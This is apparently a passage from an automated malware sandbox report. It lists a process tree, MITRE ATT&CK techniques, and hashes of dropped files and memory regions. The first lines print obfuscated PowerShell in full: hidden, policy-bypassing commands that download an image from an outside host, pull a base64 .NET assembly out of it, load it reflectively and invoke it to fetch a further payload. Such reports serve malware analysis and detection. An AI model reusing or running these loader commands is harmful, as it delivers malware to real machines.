w◀▶w◀▶DE◀▶Lw◀▶v◀▶Do◀▶c◀▶B0◀▶HQ◀▶a◀▶◀▶n◀▶C◀▶◀▶L◀▶◀▶g◀▶Cc◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶DI◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶FI◀▶ZQBn◀▶GE◀▶cwBt◀▶Cc◀▶I◀▶◀▶s◀▶C◀▶◀▶Jw◀▶z◀▶Cc◀▶I◀▶◀▶s◀▶C◀▶◀▶JwBD◀▶Do◀▶X◀▶BX◀▶Gk◀▶bgBk◀▶G8◀▶dwBz◀▶Fw◀▶V◀▶Bl◀▶G0◀▶c◀▶Bc◀▶Cc◀▶L◀▶◀▶g◀▶Cc◀▶a◀▶Br◀▶GM◀▶bQBk◀▶Cc◀▶KQ◀▶p◀▶◀▶=='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
    3⤵
    PID:1256
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TDSU/wz/wwwz/32.61.281.301//:ptth' , '' , '2' , 'Regasm' , '3' , 'C:\Windows\Temp\', 'hkcmd'))"
      4⤵
      PID:396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
275f41bd0d26e9b754292091b22142a3

SHA1
64b3e86c246b5503eca798e071be29930a22fab3

SHA256
985cb45354197cd7839b08a330f6a76841ec142626e0590f1a3355ec7ea41265

SHA512
a8107f7a7161724a962abd400533658c0ab2e176dc40ec1793e89c78891a2c8601c2d00bf88f3656ca2d8bb439b3970104bce33a0b5688630e3a073e2f5ea578

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{75AB5F7B-7452-4C9F-9A34-14B4DD1AA934}.FSD

Filesize
128KB

MD5
e9ef394810d077b49b155ff9f7e605f1

SHA1
cc46416c4a4388fa9768494a47b4a2eb8e44f2b2

SHA256
14cdf93b30ca0654e09f606e638440125004bdd683e69ff6fc40a6257b06e6a9

SHA512
074bca9aeac2a80a5ae173637d5b239d484cfdfba6ead7120498a1a7cccad6c785e5e8e6559cc90e6fe1be8a0363537661b9d8d3f0b3288a5fa514c67ffa6fd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{2A0B64F1-E402-44DC-BE8C-6687E6A47BDE}.FSD

Filesize
128KB

MD5
ab8fe78d591786f86e107ad46c5311a8

SHA1
8237caa3b0daebde93af1c45dfa114393f6ac282

SHA256
411f130f0ed3fe22a04aafdc3aac31c7dd324a9151d231dbeb43f6040d052931

SHA512
569860b574c926fea4a77af570d791d9f1112be14cd80c29357730070f2d4ea1297b2d87fe8350d8bcce2aaa92098d26e0d40cbd9cd88e445f8fc97463b0c3a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NO1NR40C\i0iooi0i0IOI0IOI0i0ioioi0I0I0IIOII0OI0I0IOI0I0OI0I0IOI0OI0I0OI0IOI0I0OI0I0##############00000##############000000000[1].doc

Filesize
22KB

MD5
c525805107dafbab4307168b2544d08c

SHA1
2514a0564bbc807fa2c4f8783232c63d39f9dc1a

SHA256
e5c0df7eb4648577abe7401b2d640479e9736e1a5d389387b92a694e4234c0d7

SHA512
f42fbb17099e0541075601f8443d96469c1fe9de28cdb6c5f9cfd7151d507dad7a3ced3dc4a13bd195aee9e3f097506cdc1a8ed43b38801c57c39a99993e3a0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFED5581.doc

Filesize
22KB

MD5
c525805107dafbab4307168b2544d08c

SHA1
2514a0564bbc807fa2c4f8783232c63d39f9dc1a

SHA256
e5c0df7eb4648577abe7401b2d640479e9736e1a5d389387b92a694e4234c0d7

SHA512
f42fbb17099e0541075601f8443d96469c1fe9de28cdb6c5f9cfd7151d507dad7a3ced3dc4a13bd195aee9e3f097506cdc1a8ed43b38801c57c39a99993e3a0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab707F.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar711E.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\{C9D77BC0-107F-4E8E-9744-2010FCC50B51}

Filesize
128KB

MD5
3b4431bb9122cd363500f882542133ab

SHA1
4e37b765ec39e0a5cd3319346e5dcce8a62129ee

SHA256
cbdbd6ea84ad776726d607437d7f88e349828d0ae8021dfa34b18d5c489b7fe6

SHA512
820b9024696d9963e55fc226fb8f9b573b10d1eec5ef0e66bec9cb29172077bcf14f8acb51ede99089cb926c04deca05515217812fed1371b75ba49cd8eb2a4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q19ZT7VXR6QC1GR0W0D8.temp

Filesize
7KB

MD5
cc33b070956644f7e6c6bed8de9c6e58

SHA1
82648ffae43450393c3b4d96a02b3665b08b6d38

SHA256
405ab9b6f08367a93e427343689be9a4ca0234ba124be95a46ee66c62667375c

SHA512
a698b062ef377e32d0d39e1b60cf3ab29bdfb9654079ab9049e536bb5820b83e62702429d2b7e4e1572fe199ddaa5a0da026eb76c7eb3a92b0df5e704af9f071

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
cc33b070956644f7e6c6bed8de9c6e58

SHA1
82648ffae43450393c3b4d96a02b3665b08b6d38

SHA256
405ab9b6f08367a93e427343689be9a4ca0234ba124be95a46ee66c62667375c

SHA512
a698b062ef377e32d0d39e1b60cf3ab29bdfb9654079ab9049e536bb5820b83e62702429d2b7e4e1572fe199ddaa5a0da026eb76c7eb3a92b0df5e704af9f071

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
cc33b070956644f7e6c6bed8de9c6e58

SHA1
82648ffae43450393c3b4d96a02b3665b08b6d38

SHA256
405ab9b6f08367a93e427343689be9a4ca0234ba124be95a46ee66c62667375c

SHA512
a698b062ef377e32d0d39e1b60cf3ab29bdfb9654079ab9049e536bb5820b83e62702429d2b7e4e1572fe199ddaa5a0da026eb76c7eb3a92b0df5e704af9f071

Download Submit
C:\Users\Admin\AppData\Roaming\Processer.vbs

Filesize
368KB

MD5
1807f50290168a82fc6cc159a7276553

SHA1
a3648981bc0f4b684a3313589214ff1f70bb7806

SHA256
eb86466f8aa2d20b0ac358545b35a5e23faeb7aa2b0297fdf7ce606f67d01190

SHA512
53e97242693386a69cc36b7d72f09cc9e5b77c909f20f83577c01b4c11bb637f4b0fc85e02800fc65bc3144c3d1fddeed989f20f86ce08f0e87dc9c04e74d242

Download Submit
C:\Users\Admin\AppData\Roaming\Processer.vbs

Filesize
368KB

MD5
1807f50290168a82fc6cc159a7276553

SHA1
a3648981bc0f4b684a3313589214ff1f70bb7806

SHA256
eb86466f8aa2d20b0ac358545b35a5e23faeb7aa2b0297fdf7ce606f67d01190

SHA512
53e97242693386a69cc36b7d72f09cc9e5b77c909f20f83577c01b4c11bb637f4b0fc85e02800fc65bc3144c3d1fddeed989f20f86ce08f0e87dc9c04e74d242

Download Submit
memory/396-250-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-230-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-435-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/396-384-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/396-383-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/396-336-0x0000000069A30000-0x0000000069FDB000-memory.dmp

Filesize
5.7MB

Download
memory/396-276-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-273-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-271-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-269-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-267-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-265-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-263-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-261-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-259-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-137-0x0000000069A30000-0x0000000069FDB000-memory.dmp

Filesize
5.7MB

Download
memory/396-138-0x0000000069A30000-0x0000000069FDB000-memory.dmp

Filesize
5.7MB

Download
memory/396-139-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/396-140-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/396-141-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/396-256-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-254-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-252-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-215-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-218-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-220-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-222-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-224-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-226-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-228-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-216-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-246-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-232-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-234-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-238-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-240-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-242-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-244-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-236-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/396-248-0x00000000088E0000-0x0000000008BFC000-memory.dmp

Filesize
3.1MB

Download
memory/1256-279-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1256-122-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1256-121-0x0000000069A30000-0x0000000069FDB000-memory.dmp

Filesize
5.7MB

Download
memory/1256-275-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1256-277-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1256-257-0x0000000069A30000-0x0000000069FDB000-memory.dmp

Filesize
5.7MB

Download
memory/1256-123-0x0000000069A30000-0x0000000069FDB000-memory.dmp

Filesize
5.7MB

Download
memory/1256-126-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1256-125-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/2064-124-0x0000000069A30000-0x0000000069FDB000-memory.dmp

Filesize
5.7MB

Download
memory/2064-120-0x0000000069A30000-0x0000000069FDB000-memory.dmp

Filesize
5.7MB

Download
memory/2064-127-0x00000000021F0000-0x0000000002230000-memory.dmp

Filesize
256KB

Download
memory/2064-128-0x00000000021F0000-0x0000000002230000-memory.dmp

Filesize
256KB

Download
memory/2064-131-0x0000000069A30000-0x0000000069FDB000-memory.dmp

Filesize
5.7MB

Download
memory/2756-119-0x0000000071FFD000-0x0000000072008000-memory.dmp

Filesize
44KB

Download
memory/2756-6-0x0000000071FFD000-0x0000000072008000-memory.dmp

Filesize
44KB

Download
memory/2756-8-0x00000000035B0000-0x00000000035B2000-memory.dmp

Filesize
8KB

Download
memory/2756-4-0x000000002F521000-0x000000002F522000-memory.dmp

Filesize
4KB

Download
memory/2972-1-0x0000000071FFD000-0x0000000072008000-memory.dmp

Filesize
44KB

Download
memory/2972-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2972-94-0x0000000071FFD000-0x0000000072008000-memory.dmp

Filesize
44KB

Download
memory/2972-9-0x0000000002D00000-0x0000000002D02000-memory.dmp

Filesize
8KB

Download